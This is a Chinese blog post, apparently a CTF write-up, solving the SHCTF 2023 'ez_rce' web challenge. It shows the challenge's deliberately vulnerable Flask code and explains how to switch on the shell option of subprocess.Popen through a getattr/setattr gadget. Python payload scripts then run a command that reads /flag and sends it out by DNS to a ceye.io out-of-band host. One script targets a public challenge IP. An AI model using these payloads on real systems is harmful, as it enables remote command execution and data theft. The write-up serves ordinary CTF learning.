

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="https://github.com/sawtooth384/image/raw/master/head.3dtemkbaoia0.webp">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="[SHCTF 2023] week2 web ez_rce题目源码(附件)如下： 123456789101112131415161718192021222324252627282930313233343536373839404142434445from flask import *import subprocessapp &#x3D; Flask(__name__)def gett(obj,arg):">
<meta property="og:type" content="article">
<meta property="og:title" content="SHCTF 2023 week2 web ez_rce">
<meta property="og:url" content="http://example.com/2023/10/14/SHCTF-week2-web-ez_rce/index.html">
<meta property="og:site_name" content="sawtooth384的博客">
<meta property="og:description" content="[SHCTF 2023] week2 web ez_rce题目源码(附件)如下： 123456789101112131415161718192021222324252627282930313233343536373839404142434445from flask import *import subprocessapp &#x3D; Flask(__name__)def gett(obj,arg):">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-10-14T05:42:58.000Z">
<meta property="article:modified_time" content="2024-10-23T12:57:57.219Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web">
<meta property="article:tag" content="rce">
<meta property="article:tag" content="python">
<meta property="article:tag" content="flask">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>SHCTF 2023 week2 web ez_rce - sawtooth384的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":false,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>sawtooth384</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://cl0v3.obs.cn-east-3.myhuaweicloud.com/img/blog/1592647477600.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle">SHCTF 2023 week2 web ez_rce</span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-14 13:42" pubdate>
          2023年10月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          47 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SHCTF 2023 week2 web ez_rce</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2024年10月23日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="SHCTF-2023-week2-web-ez-rce"><a href="#SHCTF-2023-week2-web-ez-rce" class="headerlink" title="[SHCTF 2023] week2 web ez_rce"></a>[SHCTF 2023] week2 web ez_rce</h1><p>题目源码(附件)如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> subprocess<br><br>app = Flask(__name__)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">gett</span>(<span class="hljs-params">obj,arg</span>):<br>    tmp = obj<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> arg:<br>        tmp = <span class="hljs-built_in">getattr</span>(tmp,i)<br>    <span class="hljs-keyword">return</span> tmp<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sett</span>(<span class="hljs-params">obj,arg,num</span>):<br>    tmp = obj<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(arg)-<span class="hljs-number">1</span>):<br>        tmp = <span class="hljs-built_in">getattr</span>(tmp,arg[i])<br>    <span class="hljs-built_in">setattr</span>(tmp,arg[i+<span class="hljs-number">1</span>],num)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">hint</span>(<span class="hljs-params">giveme,num,bol</span>):<br>    c = gett(subprocess,giveme)<br>    tmp = <span class="hljs-built_in">list</span>(c)<br>    tmp[num] = bol<br>    tmp = <span class="hljs-built_in">tuple</span>(tmp)<br>    sett(subprocess,giveme,tmp)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">cmd</span>(<span class="hljs-params">arg</span>):<br>    subprocess.call(arg)<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>,methods=[<span class="hljs-string">&#x27;GET&#x27;</span>,<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">exec</span>():<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-keyword">if</span> request.args.get(<span class="hljs-string">&#x27;exec&#x27;</span>)==<span class="hljs-string">&#x27;ok&#x27;</span>:<br>            shell = request.args.get(<span class="hljs-string">&#x27;shell&#x27;</span>)<br>            cmd(shell)<br>        <span class="hljs-keyword">else</span>:<br>            exp = <span class="hljs-built_in">list</span>(request.get_json()[<span class="hljs-string">&#x27;exp&#x27;</span>])<br>            num = <span class="hljs-built_in">int</span>(request.args.get(<span class="hljs-string">&#x27;num&#x27;</span>))<br>            bol = <span class="hljs-built_in">bool</span>(request.args.get(<span class="hljs-string">&#x27;bol&#x27;</span>))<br>            hint(exp,num,bol)<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;ok&#x27;</span><br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;error&#x27;</span><br>    <br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>,port=<span class="hljs-number">5000</span>)<br></code></pre></td></tr></table></figure>

<h2 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h2><p>以下内容来自<a target="_blank" rel="noopener" href="https://yiyan.baidu.com/">文心一言 </a></p>
<h3 id="整体"><a href="#整体" class="headerlink" title="整体"></a>整体</h3><blockquote>
<p>这段代码是一个基于 Flask 的 web 服务程序，它允许用户通过 web 请求执行一些操作。以下是代码的逐行详细分析：</p>
<ol>
<li><code>from flask import *</code>：从 Flask 模块导入所有内容。这将导入 Flask 框架的所有功能和类。</li>
<li><code>import subprocess</code>：导入 subprocess 模块，这个模块允许你从 Python 代码中执行外部命令。</li>
<li><code>app = Flask(__name__)</code>：创建一个 Flask web 服务实例。</li>
</ol>
<p>4-7. <code>def gett(obj,arg):</code>：定义一个函数 gett，它接收两个参数，一个对象和一个参数列表。函数通过 getattr 函数递归地获取对象的属性。</p>
<p>8-12. <code>def sett(obj,arg,num):</code>：定义一个函数 sett，它接收一个对象，一个参数列表和一个数值。函数通过 getattr 函数递归地获取对象的属性，并使用 setattr 函数设置最后一个属性的值。</p>
<p>13-19. <code>def hint(giveme,num,bol):</code>：定义一个函数 hint，它接收一个参数列表，一个数值和一个布尔值。函数首先使用 gett 函数获取 subprocess 模块的某个属性，然后修改这个属性的某个元素的值，并使用 sett 函数设置新的值。</p>
<p>20-22. <code>def cmd(arg):</code>：定义一个函数 cmd，它接收一个参数列表，并使用 subprocess.call 函数执行外部命令。</p>
<p>24-34. <code>@app.route(&#39;/&#39;,methods=[&#39;GET&#39;,&#39;POST&#39;])</code>：定义一个路由，处理 ‘/‘ 路径的 GET 和 POST 请求。请求处理函数首先检查请求参数 ‘exec’，如果它的值为 ‘ok’，则执行外部命令。否则，它从请求的 JSON 数据中获取一个表达式列表，一个数值和一个布尔值，并使用 hint 函数修改 subprocess 模块的某个属性的值。</p>
<p>35-37. <code>if __name__ == &#39;__main__&#39;:</code>：如果代码作为主程序运行，则启动 Flask web 服务，监听所有 IP 地址的 5000 端口。</p>
<p>总的来说，这段代码的功能比较模糊，它似乎允许用户通过 web 请求执行外部命令，并修改 subprocess 模块的某些属性的值。这可能是一个潜在的安全风险，因为恶意用户可以利用这个功能执行任意命令。</p>
</blockquote>
<h3 id="hint-、gett-、sett"><a href="#hint-、gett-、sett" class="headerlink" title="hint() 、gett()、sett()"></a>hint() 、gett()、sett()</h3><blockquote>
<p><code>hint</code>、<code>gett</code>和<code>sett</code>三个函数结合在一起，可以实现通过字符串形式的属性名来动态地获取和设置对象的属性值。</p>
<p><code>gett</code>函数通过递归调用<code>getattr</code>函数，可以获取对象的嵌套属性。例如，如果有一个对象<code>obj</code>，它有一个属性<code>a</code>，属性<code>a</code>又有一个属性<code>b</code>，那么我们可以通过调用<code>gett(obj, [&#39;a&#39;, &#39;b&#39;])</code>来获取<code>obj.a.b</code>的值。</p>
<p><code>sett</code>函数和<code>gett</code>函数类似，它也可以通过递归调用<code>getattr</code>函数来获取对象的嵌套属性，然后使用<code>setattr</code>函数来设置最后一个属性的值。例如，如果我们要将<code>obj.a.b</code>的值设置为<code>123</code>，可以通过调用<code>sett(obj, [&#39;a&#39;, &#39;b&#39;], 123)</code>来实现。</p>
<p><code>hint</code>函数则是利用了<code>gett</code>和<code>sett</code>函数来实现对<code>subprocess</code>模块的某个属性的修改。它首先用<code>gett</code>函数获取到属性的值，然后修改其中的某个元素，最后再用<code>sett</code>函数设置回去。</p>
<p>举一个例子来说明这三个函数的结合使用：</p>
<p>假设我们有一个对象<code>obj</code>，它有一个嵌套属性<code>a.b.c</code>，我们想要将其值设置为<code>True</code>。可以先通过<code>gett(obj, [&#39;a&#39;, &#39;b&#39;])</code>获取到<code>obj.a.b</code>的值，然后将其属性<code>c</code>设置为<code>True</code>，最后再通过<code>sett(obj, [&#39;a&#39;, &#39;b&#39;], new_value)</code>将新的值设置回去。其中，<code>new_value</code>就是修改后的<code>obj.a.b</code>的值。</p>
<p>以上就是对<code>hint</code>、<code>gett</code>和<code>sett</code>三个函数的结合分析和例子说明。</p>
</blockquote>
<h2 id="subprocess-call"><a href="#subprocess-call" class="headerlink" title="subprocess.call()"></a>subprocess.call()</h2><blockquote>
<p>执行由参数提供的命令,返回状态码<br>我们可以用数组作为参数运行命令,也可以用字符串作为参数运行命令(通过设置参数shell=True)<br>注意,参数shell默认为False</p>
</blockquote>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><h3 id="执行命令"><a href="#执行命令" class="headerlink" title="执行命令"></a>执行命令</h3><p>利用<code>subprocess.call()</code>执行命令需要其默认参数<code>shell=True</code></p>
<p>而<code>hint()</code>函数恰好提供了对应的功能</p>
<p>接下来就是设法找到shell参数的位置</p>
<h5 id="寻找shell参数的位置"><a href="#寻找shell参数的位置" class="headerlink" title="寻找shell参数的位置"></a>寻找shell参数的位置</h5><p>在python中，函数也是一种对象</p>
<blockquote>
<p>Python确实有一个内置类型叫做 “function”，它代表了Python中的函数对象。</p>
<p>函数对象在Python中是一等公民，这意味着它们可以被赋值给变量，作为参数传递给其他函数，以及作为返回值返回。函数对象还具有一些内置方法和属性，例如 <code>__name__</code>、<code>__doc__</code> 和 <code>__call__</code>。</p>
</blockquote>
<p>其中一个内置方法：</p>
<blockquote>
<p><code>__defaults__</code>：函数的默认参数值的元组</p>
</blockquote>
<p>然而，这还不够</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">print</span>(<span class="hljs-built_in">getattr</span>(subprocess.call,<span class="hljs-string">&quot;__defaults__&quot;</span>))<br><span class="hljs-comment">#None</span><br></code></pre></td></tr></table></figure>

<p>None表示空</p>
<p><em>山重水复疑无路，柳暗花明又一村</em></p>
<p>查询<code>subprocess</code>源码(subprocess.py)：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">call</span>(<span class="hljs-params">*popenargs, **kwargs</span>):<br>    <span class="hljs-string">&quot;&quot;&quot;Run command with arguments.  Wait for command to complete, then</span><br><span class="hljs-string">    return the returncode attribute.</span><br><span class="hljs-string"></span><br><span class="hljs-string">    The arguments are the same as for the Popen constructor.  Example:</span><br><span class="hljs-string"></span><br><span class="hljs-string">    retcode = call([&quot;ls&quot;, &quot;-l&quot;])</span><br><span class="hljs-string">    &quot;&quot;&quot;</span><br>    <span class="hljs-keyword">return</span> Popen(*popenargs, **kwargs).wait()<br></code></pre></td></tr></table></figure>

<p>注意到调用了<code>Popen()</code>并把参数传了过去</p>
<p><code>popen</code>是一个对象(类)</p>
<p>这样操作会调用<code>Popen</code>中的魔术方法<code>__init__</code></p>
<p>其参数中同样有我们想要修改的<code>shell</code>参数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">__init__(self, args, bufsize=<span class="hljs-number">0</span>, executable=<span class="hljs-literal">None</span>,<br>                 stdin=<span class="hljs-literal">None</span>, stdout=<span class="hljs-literal">None</span>, stderr=<span class="hljs-literal">None</span>,<br>                 preexec_fn=<span class="hljs-literal">None</span>, close_fds=<span class="hljs-literal">False</span>, shell=<span class="hljs-literal">False</span>,<br>                 cwd=<span class="hljs-literal">None</span>, env=<span class="hljs-literal">None</span>, universal_newlines=<span class="hljs-literal">False</span>,<br>                 startupinfo=<span class="hljs-literal">None</span>, creationflags=<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">print</span>(<span class="hljs-built_in">getattr</span>(subprocess.Popen.__init__,<span class="hljs-string">&quot;__defaults__&quot;</span>))<br><span class="hljs-comment">#(-1, None, None, None, None, None, True, False, None, None, None, None, 0, True, False, ())</span><br></code></pre></td></tr></table></figure>

<p>经多次测试，其中下标为7处的元素为默认参数<code>shell</code>的值</p>
<p>更改参数脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests  <br><span class="hljs-keyword">import</span> json  <br>  <br>data = &#123;  <br>    <span class="hljs-string">&quot;exp&quot;</span>: [<span class="hljs-string">&quot;Popen&quot;</span>,<span class="hljs-string">&quot;__init__&quot;</span>,<span class="hljs-string">&quot;__defaults__&quot;</span>]  <br>&#125;  <br>params=&#123;<br>    <span class="hljs-string">&#x27;num&#x27;</span>: <span class="hljs-string">&quot;7&quot;</span>,  <br>    <span class="hljs-string">&#x27;bol&#x27;</span>: <span class="hljs-literal">True</span>  <br>&#125;<br>r = requests.post(<span class="hljs-string">&#x27;http://127.0.0.1:5000/&#x27;</span>, json=data,params=params)  <br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求头是：&quot;</span>, r.request.headers)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求体是：&quot;</span>, r.request.body)<br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>

<h3 id="获取回显"><a href="#获取回显" class="headerlink" title="获取回显"></a>获取回显</h3><p>根据代码逻辑</p>
<p>命令执行是没有回显的</p>
<p>此时可以使用<strong>dns/http外带</strong>  </p>
<h4 id="dns-http外带"><a href="#dns-http外带" class="headerlink" title="dns/http外带"></a>dns/http外带</h4><p>需要平台</p>
<p>比如<a target="_blank" rel="noopener" href="http://ceye.io/records/dns?_blank">CEYE - Monitor service for security testing</a>   </p>
<p>burpsuit也有类似功能</p>
<p>具体：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1956480?_blank">带外攻击OOB（RCE无回显骚思路总结）-腾讯云开发者社区-腾讯云 (tencent.com)</a>  </p>
<p>payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests  <br><span class="hljs-keyword">import</span> json  <br>  <br>params=&#123;<br>    <span class="hljs-string">&#x27;exec&#x27;</span>: <span class="hljs-string">&quot;ok&quot;</span>,  <br>    <span class="hljs-string">&#x27;shell&#x27;</span>: <span class="hljs-string">&quot;ping -c 3 `cat /flag`.xxxxx.ceye.io&quot;</span>  <span class="hljs-comment">#-c 3 请求三次</span><br>&#125;<br>r = requests.get(<span class="hljs-string">&#x27;http://112.6.51.212:30434/&#x27;</span>, params=params)  <br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求头是：&quot;</span>, r.request.headers)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求体是：&quot;</span>, r.request.body)<br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>

<p>命令执行过程：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#发现flag文件</span><br><span class="hljs-built_in">ls</span> /|grep <span class="hljs-string">&#x27;f&#x27;</span>|<span class="hljs-built_in">base64</span> <span class="hljs-comment">#将根目录下以f开头的文件或文件夹以回车键隔开并进行base64编码</span><br><span class="hljs-comment">#读取flag</span><br><span class="hljs-built_in">cat</span> /flag<br></code></pre></td></tr></table></figure>

<h2 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h2><p>先执行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests  <br><span class="hljs-keyword">import</span> json  <br>  <br>data = &#123;  <br>    <span class="hljs-string">&quot;exp&quot;</span>: [<span class="hljs-string">&quot;Popen&quot;</span>,<span class="hljs-string">&quot;__init__&quot;</span>,<span class="hljs-string">&quot;__defaults__&quot;</span>]  <br>&#125;  <br>params=&#123;<br>    <span class="hljs-string">&#x27;num&#x27;</span>: <span class="hljs-string">&quot;7&quot;</span>,  <br>    <span class="hljs-string">&#x27;bol&#x27;</span>: <span class="hljs-literal">True</span>  <br>&#125;<br>r = requests.post(<span class="hljs-string">&#x27;http://127.0.0.1:5000/&#x27;</span>, json=data,params=params)  <br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求头是：&quot;</span>, r.request.headers)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求体是：&quot;</span>, r.request.body)<br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>

<p>再执行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests  <br><span class="hljs-keyword">import</span> json  <br>  <br>params=&#123;<br>    <span class="hljs-string">&#x27;exec&#x27;</span>: <span class="hljs-string">&quot;ok&quot;</span>,  <br>    <span class="hljs-string">&#x27;shell&#x27;</span>: <span class="hljs-string">&quot;ping -c 3 `cat /flag`.xxxxx.ceye.io&quot;</span>  <br>&#125;<br>r = requests.get(<span class="hljs-string">&#x27;http://127.0.0.1:5000/&#x27;</span>, params=params)  <br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求头是：&quot;</span>, r.request.headers)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;请求体是：&quot;</span>, r.request.body)<br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>



<h2 id="引用"><a href="#引用" class="headerlink" title="引用"></a>引用</h2><p>本文引用几乎全部来自<a target="_blank" rel="noopener" href="https://yiyan.baidu.com/">文心一言 (baidu.com)</a> </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/">#web</a>
      
        <a href="/tags/rce/">#rce</a>
      
        <a href="/tags/python/">#python</a>
      
        <a href="/tags/flask/">#flask</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SHCTF 2023 week2 web ez_rce</div>
      <div>http://example.com/2023/10/14/SHCTF-week2-web-ez_rce/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年10月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/07/%5BHarekazeCTF2019%5DAvatar%20Uploader%201/" title="HarekazeCTF2019 Avatar Uploader 1">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HarekazeCTF2019 Avatar Uploader 1</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/05/%5BMRCTF2020%5D%E5%A5%97%E5%A8%83/" title="MRCTF2020 套娃">
                        <span class="hidden-mobile">MRCTF2020 套娃</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
